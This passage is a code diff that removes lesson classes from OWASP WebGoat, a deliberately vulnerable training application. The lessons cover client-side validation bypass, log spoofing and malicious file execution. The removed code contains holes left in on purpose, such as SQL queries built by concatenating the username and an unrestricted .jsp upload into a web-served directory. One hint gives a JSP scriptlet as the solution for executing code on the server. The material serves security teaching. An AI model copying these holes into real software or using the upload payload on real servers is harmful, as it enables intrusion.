-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the HelloScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("JSON Injection");
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/JavaScriptValidation.java

@@ -1,270 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import java.util.regex.Pattern;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TextArea;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created October 28, 2003
- */
-
-public class JavaScriptValidation extends LessonAdapter
-{
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-
-        ElementContainer ec = new ElementContainer();
-
-        // Regular expressions in Java and JavaScript compatible form
-
-        // Note: if you want to use the regex=new RegExp(\"" + regex + "\");" syntax
-
-        // you'll have to use \\\\d to indicate a digit for example -- one escaping for Java and one
-        // for JavaScript
-
-        String regex1 = "^[a-z]{3}$";// any three lowercase letters
-        String regex2 = "^[0-9]{3}$";// any three digits
-        String regex3 = "^[a-zA-Z0-9 ]*$";// alphanumerics and space without punctuation
-        String regex4 = "^(one|two|three|four|five|six|seven|eight|nine)$";// enumeration of
-        // numbers
-        String regex5 = "^\\d{5}$";// simple zip code
-        String regex6 = "^\\d{5}(-\\d{4})?$";// zip with optional dash-four
-        String regex7 = "^[2-9]\\d{2}-?\\d{3}-?\\d{4}$";// US phone number with or without dashes
-        Pattern pattern1 = Pattern.compile(regex1);
-        Pattern pattern2 = Pattern.compile(regex2);
-        Pattern pattern3 = Pattern.compile(regex3);
-        Pattern pattern4 = Pattern.compile(regex4);
-        Pattern pattern5 = Pattern.compile(regex5);
-        Pattern pattern6 = Pattern.compile(regex6);
-        Pattern pattern7 = Pattern.compile(regex7);
-        String lineSep = System.getProperty("line.separator");
-        String script = "<SCRIPT>" + lineSep + "regex1=/" + regex1 + "/;" + lineSep + "regex2=/" + regex2 + "/;"
-                + lineSep + "regex3=/" + regex3 + "/;" + lineSep + "regex4=/" + regex4 + "/;" + lineSep + "regex5=/"
-                + regex5 + "/;" + lineSep + "regex6=/" + regex6 + "/;" + lineSep + "regex7=/" + regex7 + "/;" + lineSep
-                + "function validate() { " + lineSep + "msg='JavaScript found form errors'; err=0; " + lineSep
-                + "if (!regex1.test(document.form.field1.value)) {err+=1; msg+='\\n  bad field1';}" + lineSep
-                + "if (!regex2.test(document.form.field2.value)) {err+=1; msg+='\\n  bad field2';}" + lineSep
-                + "if (!regex3.test(document.form.field3.value)) {err+=1; msg+='\\n  bad field3';}" + lineSep
-                + "if (!regex4.test(document.form.field4.value)) {err+=1; msg+='\\n  bad field4';}" + lineSep
-                + "if (!regex5.test(document.form.field5.value)) {err+=1; msg+='\\n  bad field5';}" + lineSep
-                + "if (!regex6.test(document.form.field6.value)) {err+=1; msg+='\\n  bad field6';}" + lineSep
-                + "if (!regex7.test(document.form.field7.value)) {err+=1; msg+='\\n  bad field7';}" + lineSep
-                + "if ( err > 0 ) alert(msg);" + lineSep + "else document.form.submit();" + lineSep + "} " + lineSep
-                + "</SCRIPT>" + lineSep;
-        try
-        {
-            String param1 = s.getParser().getRawParameter("field1", "abc");
-            String param2 = s.getParser().getRawParameter("field2", "123");
-            String param3 = s.getParser().getRawParameter("field3", "abc 123 ABC");
-            String param4 = s.getParser().getRawParameter("field4", "seven");
-            String param5 = s.getParser().getRawParameter("field5", "90210");
-            String param6 = s.getParser().getRawParameter("field6", "90210-1111");
-            String param7 = s.getParser().getRawParameter("field7", "301-604-4882");
-            ec.addElement(new StringElement(script));
-            TextArea input1 = new TextArea("field1", 1, 25).addElement(param1);
-            TextArea input2 = new TextArea("field2", 1, 25).addElement(param2);
-            TextArea input3 = new TextArea("field3", 1, 25).addElement(param3);
-            TextArea input4 = new TextArea("field4", 1, 25).addElement(param4);
-            TextArea input5 = new TextArea("field5", 1, 25).addElement(param5);
-            TextArea input6 = new TextArea("field6", 1, 25).addElement(param6);
-            TextArea input7 = new TextArea("field7", 1, 25).addElement(param7);
-
-            Input b = new Input();
-            b.setType(Input.BUTTON);
-            b.setValue("Submit");
-            b.addAttribute("onclick", "validate();");
-            ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("3LowerCase")+"("
-                    + regex1 + ")")));
-            ec.addElement(new Div().addElement(input1));
-            ec.addElement(new P());
-            ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("Exactly3Digits")+"(" + regex2 + ")")));
-            ec.addElement(new Div().addElement(input2));
-            ec.addElement(new P());
-            ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("LettersNumbersSpaceOnly")+"(" + regex3
-                    + ")")));
-            ec.addElement(new Div().addElement(input3));
-            ec.addElement(new P());
-            ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("EnumerationOfNumbers")+" (" + regex4 + ")")));
-            ec.addElement(new Div().addElement(input4));
-            ec.addElement(new P());
-            ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("SimpleZipCode")+ " (" + regex5 + ")")));
-            ec.addElement(new Div().addElement(input5));
-            ec.addElement(new P());
-            ec.addElement(new Div()
-                    .addElement(new StringElement(getLabelManager().get("ZIPDashFour")+" (" + regex6 + ")")));
-            ec.addElement(new Div().addElement(input6));
-            ec.addElement(new P());
-            ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("USPhoneNumber")+ " ("
-                    + regex7 + ")")));
-            ec.addElement(new Div().addElement(input7));
-            ec.addElement(new P());
-            ec.addElement(b);
-
-            // Check the patterns on the server -- and note the errors in the response
-            // these should never match unless the client side pattern script doesn't work
-
-            int err = 0;
-            String msg = "";
-
-            if (!pattern1.matcher(param1).matches())
-            {
-                err++;
-                msg += "<BR>"+getLabelManager().get("ServerSideValidationViolation")+" Field1.";
-            }
-
-            if (!pattern2.matcher(param2).matches())
-            {
-                err++;
-                msg += "<BR>"+getLabelManager().get("ServerSideValidationViolation")+" Field2.";
-            }
-
-            if (!pattern3.matcher(param3).matches())
-            {
-                err++;
-                msg += "<BR>"+getLabelManager().get("ServerSideValidationViolation")+"Field3.";
-            }
-
-            if (!pattern4.matcher(param4).matches())
-            {
-                err++;
-                msg += "<BR>"+getLabelManager().get("ServerSideValidationViolation")+"Field4.";
-            }
-
-            if (!pattern5.matcher(param5).matches())
-            {
-                err++;
-                msg += "<BR>"+getLabelManager().get("ServerSideValidationViolation")+"Field5.";
-            }
-
-            if (!pattern6.matcher(param6).matches())
-            {
-                err++;
-                msg += "<BR>"+getLabelManager().get("ServerSideValidationViolation")+"Field6.";
-            }
-
-            if (!pattern7.matcher(param7).matches())
-            {
-                err++;
-                msg += "<BR>"+getLabelManager().get("ServerSideValidationViolation")+"Field7.";
-            }
-
-            if (err > 0)
-            {
-                s.setMessage(msg);
-            }
-            if (err >= 7)
-            {
-                // This means they defeated all the client side checks
-                makeSuccess(s);
-            }
-        }
-
-        catch (Exception e)
-        {
-            s.setMessage(getLabelManager().get("ErrorGenerating") + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    /**
-     * DOCUMENT ME!
-     * 
-     * @return DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.PARAMETER_TAMPERING;
-    }
-
-    /**
-     * Gets the hints attribute of the AccessControlScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add(getLabelManager().get("JavaScriptValidationHint1"));
-        hints.add(getLabelManager().get("JavaScriptValidationHint2"));
-        hints.add(getLabelManager().get("JavaScriptValidationHint3"));
-        
-
-        return hints;
-    }
-
-
-    private final static Integer DEFAULT_RANKING = new Integer(120);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the AccessControlScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Bypass Client Side JavaScript Validation");
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/LogSpoofing.java

@@ -1,159 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.io.UnsupportedEncodingException;
-import java.net.URLDecoder;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.HtmlColor;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.PRE;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Sherif Koussa <a href="http://www.softwaresecured.com">Software Secured</a>
- * @created October 28, 2006
- */
-
-public class LogSpoofing extends LessonAdapter
-{
-
-    private static final String USERNAME = "username";
-
-    private static final String PASSWORD = "password";
-    
-
-    public final static A MAC_LOGO = new A().setHref("http://www.softwaresecured.com").addElement(new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured").setBorder(0).setHspace(0).setVspace(0));
-    
-    protected Element createContent(WebSession s)
-    {
-
-        ElementContainer ec = null;
-        String inputUsername = null;
-        try
-        {
-
-            Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-            TR row1 = new TR();
-            TR row2 = new TR();
-            TR row3 = new TR();
-
-            row1.addElement(new TD(new StringElement(getLabelManager().get("UserName")+":")));
-            Input username = new Input(Input.TEXT, USERNAME, "");
-            row1.addElement(new TD(username));
-
-            row2.addElement(new TD(new StringElement(getLabelManager().get("Password")+": ")));
-            Input password = new Input(Input.PASSWORD, PASSWORD, "");
-            row2.addElement(new TD(password));
-
-            Element b = ECSFactory.makeButton(getLabelManager().get("Login"));
-            row3.addElement(new TD(new StringElement("&nbsp; ")));
-            row3.addElement(new TD(b)).setAlign("right");
-
-            t.addElement(row1);
-            t.addElement(row2);
-            t.addElement(row3);
-
-            ec = new ElementContainer();
-            ec.addElement(t);
-
-            inputUsername = new String(s.getParser().getRawParameter(USERNAME, ""));
-            
-            if (inputUsername.length() != 0)
-            {
-                inputUsername = URLDecoder.decode(inputUsername, "UTF-8");
-            }
-
-            ec.addElement(new PRE(" "));
-
-            Table t2 = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-            TR row4 = new TR();
-            row4.addElement(new TD(new PRE(getLabelManager().get("LoginFailedForUserName")+": " + inputUsername))).setBgColor(HtmlColor.GRAY);
-
-            t2.addElement(row4);
-
-            ec.addElement(t2);          
-                    
-            if (inputUsername.length() > 0 && inputUsername.indexOf('\n') >= 0 && inputUsername.indexOf('\n') >= 0)
-            {               
-                makeSuccess(s);
-            }
-        } catch (UnsupportedEncodingException e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-        return ec;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(72);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    @Override
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add(getLabelManager().get("LogSpoofingHint1"));
-        hints.add(getLabelManager().get("LogSpoofingHint2"));
-        hints.add(getLabelManager().get("LogSpoofingHint3"));
-        hints.add(getLabelManager().get("LogSpoofingHint4"));
-        return hints;
-    }
-
-    @Override
-    public String getTitle()
-    {
-        return "Log Spoofing";
-    }
-
-    @Override
-    protected Category getDefaultCategory()
-    {
-        return Category.INJECTION;
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by Sherif Koussa&nbsp;", MAC_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java

@@ -1,501 +0,0 @@
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.util.ArrayList;
-import java.util.List;
-import java.io.File;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.Form;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.IMG;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-import org.apache.commons.fileupload.*;
-import org.apache.commons.fileupload.disk.*;
-import org.apache.commons.fileupload.servlet.*;
-
-/*******************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
- * for free software projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Chuck Willis of <a href="http://www.mandiant.com">MANDIANT</a> 
- * @created July 11, 2008
- */
-public class MaliciousFileExecution extends LessonAdapter
-{
-
-    private final static A MANDIANT_LOGO = new A().setHref("http://www.mandiant.com").addElement(new IMG("images/logos/mandiant.png").setAlt("MANDIANT").setBorder(0).setHspace(0).setVspace(0));
-    
-    // the UPLOADS_DIRECTORY is where uploads are stored such that they can be references
-    // in image tags as "uploads/filename.ext".  This directory string should not contain any path separators (/ or \)
-    private String uploads_and_target_parent_directory = null; 
-    
-    private final static String UPLOADS_RELATIVE_PATH = "uploads";
-    
-    // this is the target directory that the user must put a file in to pass the lessson.  The file must be named
-    // username.txt.  This directory string should not contain any path separators (/ or \)
-
-    private final static String TARGET_RELATIVE_PATH = "mfe_target"; 
-    
-    // this should probably go in a constructor, but we need the session object...
-    // may be able to do something like:
-    //    String directory = this.getServletContext().getRealPath("/");
-    private void fill_uploads_and_target_parent_directory(WebSession s) {
-        //uploads_and_target_parent_directory = s.getWebgoatContext().getServlet().getServletContext().getRealPath("/");
-        uploads_and_target_parent_directory = s.getContext().getRealPath("/");
-        // make sure it ends with a / or \
-        if(!uploads_and_target_parent_directory.endsWith(File.separator)) {
-            uploads_and_target_parent_directory = uploads_and_target_parent_directory + 
-                File.separator;
-        }
-        System.out.println("uploads_and_target_parent_directory set to = " 
-                + uploads_and_target_parent_directory);
-        
-        // make sure the directories exist
-        File uploads_dir = new File(uploads_and_target_parent_directory
-                + UPLOADS_RELATIVE_PATH);
-        uploads_dir.mkdir();
-        
-        File target_dir = new File(uploads_and_target_parent_directory 
-                + TARGET_RELATIVE_PATH);
-        target_dir.mkdir();
-        
-        // delete the user's target file if it is already there since we must
-            // have restarted webgoat
-        File userfile = new File(uploads_and_target_parent_directory 
-                + TARGET_RELATIVE_PATH + java.io.File.separator 
-                + s.getUserName() + ".txt");
-        
-        userfile.delete();
-        
-    }
-    
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *                Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        
-    if(uploads_and_target_parent_directory == null) {
-        fill_uploads_and_target_parent_directory(s);
-    }
-    
-    
-    ElementContainer ec = new ElementContainer();
-
-    try
-    {
-        
-        // check for success - see if the target file exists yet
-        
-        File userfile = new File(uploads_and_target_parent_directory 
-                + TARGET_RELATIVE_PATH + java.io.File.separator 
-                + s.getUserName() + ".txt");
-        
-        if(userfile.exists()) {
-            makeSuccess(s);
-        }
-        
-        Connection connection = DatabaseUtilities.getConnection(s);
-        
-        ec.addElement(new H1().addElement("WebGoat Image Storage"));
-        
-        // show the current image
-        ec.addElement(new P().addElement("Your current image:"));
-        
-        String image_query = "SELECT image_relative_url FROM mfe_images WHERE user_name = '" 
-            + s.getUserName() + "'";
-
-        Statement image_statement = connection.createStatement(
-                ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-        ResultSet image_results = image_statement.executeQuery(image_query);
-        
-        if(image_results.next() == false) {
-            // result set was empty
-            ec.addElement(new P().addElement("No image uploaded"));
-            System.out.println("No image uploaded");
-        } else {
-
-            String image_url = image_results.getString(1);
-            
-            ec.addElement(new IMG(image_url).setBorder(0).setHspace(0).setVspace(0));
-            
-            System.out.println("Found image named: " + image_url);
-
-        }
-        
-        ec.addElement(new P().addElement("Upload a new image:"));
-
-        Input input = new Input(Input.FILE, "myfile", "");
-        ec.addElement(input);
-        
-        Element b = ECSFactory.makeButton("Start Upload");
-        ec.addElement(b);
-        
-    }
-    catch (Exception e)
-    {
-        s.setMessage("Error generating " + this.getClass().getName());
-        e.printStackTrace();
-    }
-
-    return (ec);
-    }
-
-    /**
-     * Gets the category attribute of the SqlInjection object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-    return Category.MALICIOUS_EXECUTION;
-    }
-
-    /**
-     * Gets the credits attribute of the AbstractLesson object
-     * 
-     * @return The credits value
-     */
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by Chuck Willis&nbsp;", MANDIANT_LOGO);
-    }
-
-    /**
-     * Gets the hints attribute of the DatabaseFieldScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        if(uploads_and_target_parent_directory == null) {
-            fill_uploads_and_target_parent_directory(s);
-        }
-        
-        String target_filename = uploads_and_target_parent_directory
-            + TARGET_RELATIVE_PATH 
-            + java.io.File.separator 
-            + s.getUserName() + ".txt";
-        
-    List<String> hints = new ArrayList<String>();
-
-        hints.add("Where are uploaded images stored?  Can you browse to them directly?");
-        
-        hints.add("What type of file can you upload to a J2EE server that will be executed when you browse to it?");
-        
-        hints.add("You want to upload a .jsp file that creates an instance of the class java.io.File " +
-                " and calls the createNewFile() method of that instance.");
-     
-        hints.add("Below are some helpful links..." +
-        "<br><br>Here is a page with an example of a simple .jsp file using a Scriptlet:" +
-        "<br><a href=\"http://www.jsptut.com/Scriptlets.jsp\">" +
-        "http://www.jsptut.com/Scriptlets.jsp</a>" +
-        "<br><br>Here is an page with an example of using createNewFile():" +
-        "<br><a href=\"http://www.roseindia.net/java/example/java/io/CreateFile.shtml\">" +
-        "http://www.roseindia.net/java/example/java/io/CreateFile.shtml</a>" +
-        "<br><br>Here is the API specification for java.io.File:" +
-        "<br><a href=\"http://java.sun.com/j2se/1.5.0/docs/api/java/io/File.html\">" +
-        "http://java.sun.com/j2se/1.5.0/docs/api/java/io/File.html</a>"
-        );
-        
-        hints
-        .add("Here is an example .jsp file, modify it to use java.io.File and its createNewFile() method:"
-            + "<br><br>&lt;HTML&gt;"
-            + "<br>&lt;%"
-            + "<br>java.lang.String hello = new java.lang.String(\"Hello World!\");"
-            + "<br>System.out.println(hello);"
-            + "<br>%&gt;"
-            + "<br>&lt;/HTML&gt;"
-            + "<br><br>NOTE: executing this file will print \"Hello World!\" to the Tomcat Console, not to your client browser"
-            );
-        
-        
-        hints
-            .add("SOLUTION:<br><br>Upload a file with a .jsp extension and this content:"
-                + "<br><br>&lt;HTML&gt;"
-                + "<br>&lt;%"
-                + "<br>java.io.File file = new java.io.File(\""
-                + target_filename.replaceAll("\\\\", "\\\\\\\\") // if we are on windows, we need to 
-                    // make sure path separators are doubled / escaped
-                + "\");"
-                + "<br>file.createNewFile();"
-                + "<br>%&gt;"
-                + "<br>&lt;/HTML&gt;"
-                + "<br><br>After you have uploaded your jsp file, you can get the system to execute it by opening it in your browser at the URL below (or by just refreshing this page):" 
-                + "<br><br>http://webgoat_ip:port/WebGoat/" + UPLOADS_RELATIVE_PATH + "/yourfilename.jsp"
-                );
-        
-    return hints;
-    }
-
-    // this is a custom method for this lesson to restart.  It is called in WebSession.restartLesson
-    // in a currently somewhat "hacked up" manner that is specific to this lesson.  There probably
-    // should be an abstract type for lessons that need custom "restarting" code.
-    public void restartLesson(WebSession s)
-    {
- 
-        if(uploads_and_target_parent_directory == null) {
-            fill_uploads_and_target_parent_directory(s);
-        }
-        
-        System.out.println("Restarting Malicious File Execution lesson for user " + s.getUserName());
-        
-        // delete the user's target file
-        File userfile = new File(uploads_and_target_parent_directory 
-                + TARGET_RELATIVE_PATH 
-                + java.io.File.separator 
-                + s.getUserName() + ".txt");
-        
-        userfile.delete();
-        
-        // remove the row from the mfe table
-        // add url to database table
-        
-        try {
-            Connection connection = DatabaseUtilities.getConnection(s);
-            
-            Statement statement = connection.createStatement();
-            
-            String deleteuserrow = "DELETE from mfe_images WHERE user_name = '"
-                + s.getUserName() + "';";
-
-            statement.executeUpdate(deleteuserrow);
-            
-        } catch (SQLException e) {
-            // TODO Auto-generated catch block
-            e.printStackTrace();
-        }
-
-    }
-   
-    // cleanup code has been disabled for now.  I'm not sure where it can be called cleanly
-    // where it will know what directory to use since that is pulled from the session object
-    
-    // this method will delete files in the target directory and the uploads directory
-    // it should be called when WebGoat starts
-//    public static void cleanDirectories() {
-//      // delete files in TARGET_DIRECTORY
-//      File target_dir = new File(TARGET_RELATIVE_PATH);
-//      deleteFilesInDir(target_dir);
-//      
-//      // delete files in uploads directory
-//      File uploads_dir = new File(uploads_and_target_parent_directory + UPLOADS_RELATIVE_PATH);
-//      deleteFilesInDir(uploads_dir);
-//      
-//    }
-    
-//    private static void deleteFilesInDir(File dir) {
-//          File[] dir_files = dir.listFiles();
-//      for(int i = 0; i < dir_files.length; i++) {
-//          // we won't recurse and we don't want to delete every file just in 
-//          // case TARGET_DIRECTORY or uploads directory is pointed
-//          // somewhere stupid, like c:\ or /
-//          if(dir_files[i].isFile()) { 
-//              String lower_file_name = dir_files[i].getName().toLowerCase(); 
-//              
-//              if(lower_file_name.endsWith(".jpg") ||
-//                  lower_file_name.endsWith(".gif") ||
-//                  lower_file_name.endsWith(".png") ||
-//                  lower_file_name.endsWith(".jsp") ||
-//                  lower_file_name.endsWith(".txt") ||
-//                  lower_file_name.endsWith(".asp") || // in case they think this is a IIS server :-)
-//                  lower_file_name.endsWith(".aspx")) {
-//                      dir_files[i].delete();
-//              }
-//          }
-//      }   
-//    }
-   
-    
-    /**
-     * Gets the instructions attribute of the object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-        if(uploads_and_target_parent_directory == null) {
-            fill_uploads_and_target_parent_directory(s);
-        }
-        
-    String instructions = "The form below allows you to upload an image which will be displayed on this page.  " 
-        + "Features like this are often found on web based discussion boards and social networking sites.  " 
-        + "This feature is vulnerable to Malicious File Execution."
-        + "<br><br>In order to pass this lesson, upload and run a malicious file.  In order to prove that your file can execute,"
-        + " it should create another file named:<br><br> "
-        + uploads_and_target_parent_directory
-        + TARGET_RELATIVE_PATH 
-        + java.io.File.separator 
-        + s.getUserName() + ".txt" 
-        + "<br><br>Once you have created this file, you will pass the lesson.";
-
-    return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(75);
-
-    protected Integer getDefaultRanking()
-    {
-    return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the DatabaseFieldScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-    return ("Malicious File Execution");
-    }
-
-    /**
-     * Constructor for the DatabaseFieldScreen object
-     * 
-     * @param s
-     *                Description of the Parameter
-     */
-    public void handleRequest(WebSession s)
-    {
-        
-        if(uploads_and_target_parent_directory == null) {
-            fill_uploads_and_target_parent_directory(s);
-        }
-        
-        
-            
-    try
-    {
-        if(ServletFileUpload.isMultipartContent(s.getRequest())) {
-            // multipart request - we have the file upload
-            
-//           Create a factory for disk-based file items
-            DiskFileItemFactory factory = new DiskFileItemFactory();
-            factory.setSizeThreshold(500000); // files over 500k will be written to disk temporarily.  
-            // files under that size will be stored in memory until written to disk by the request handler code below
-            
-//           Create a new file upload handler
-            ServletFileUpload upload = new ServletFileUpload(factory);
-            
-//           Parse the request
-            List /* FileItem */ items = upload.parseRequest(s.getRequest());
-            
-//           Process the uploaded items
-            java.util.Iterator iter = items.iterator();
-            while (iter.hasNext()) {
-                FileItem item = (FileItem) iter.next();
-
-                if (item.isFormField()) {
-                    
-                    // ignore regular form fields
-                    
-                } else {
-                    
-                    // not a form field, must be a file upload
-                    if(item.getName().contains("/") || item.getName().contains("\\")) {
-                        System.out.println("Uploaded file contains a / or \\ (i.e. attempted directory traversal).  Not storing file.");
-                        // TODO - is there a way to show an error to the user here?
-                        
-                        s.setMessage("Directory traversal not allowed.  Nice try though.");
-                        
-                    } else {
-                    
-                        // write file to disk with original name in uploads directory
-                        String uploaded_file_path = uploads_and_target_parent_directory 
-                            + UPLOADS_RELATIVE_PATH 
-                            + java.io.File.separator
-                            + item.getName();
-                        File uploadedFile = new File(uploaded_file_path);
-                        item.write(uploadedFile);
-                        System.out.println("Stored file:\n" + uploaded_file_path );
-                        
-                        // add url to database table
-                        Connection connection = DatabaseUtilities.getConnection(s);
-                        
-                        Statement statement = connection.createStatement();
-                        
-                        // attempt an update
-                        String updateData1 = "UPDATE mfe_images SET image_relative_url='" + UPLOADS_RELATIVE_PATH + "/"
-                            + item.getName() + "' WHERE user_name = '"
-                            + s.getUserName() + "';";
-                        
-                        System.out.println("Updating row:\n" + updateData1 );
-                        if(statement.executeUpdate(updateData1) == 0) {
-                        
-                            // update failed, we need to add a row
-                            String insertData1 = "INSERT INTO mfe_images VALUES ('" +
-                                s.getUserName() + "','" + UPLOADS_RELATIVE_PATH + "/" + 
-                                item.getName() + "')";
-                            
-                            System.out.println("Inserting row:\n" + insertData1 );
-                            statement.executeUpdate(insertData1);
-                            
-                        }
-                    }
-                    
-                }
-            }
-            
-        } 
-            // now handle normally (if it was a multipart request or now)
-            
-            //super.handleRequest(s);
-            
-            // needed to cut and paste and edit rather than calling super 
-            // here so that we could set the encoding type to multipart form data
-            // call createContent first so messages will go somewhere
-
-            Form form = new Form(getFormAction(), Form.POST).setName("form")
-                .setEncType("multipart/form-data");
-
-            form.addElement(createContent(s));
-
-            setContent(form);
-    }
-    catch (Exception e)
-    {
-        System.out.println("Exception caught: " + e);
-        e.printStackTrace(System.out);
-    }
-    }
-}

src/main/java/org/owasp/webgoat/lessons/MultiLevelLogin1.java

@@ -1,851 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.H2;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.apache.ecs.xhtml.style;
-import org.owasp.webgoat.session.DatabaseUtilities;
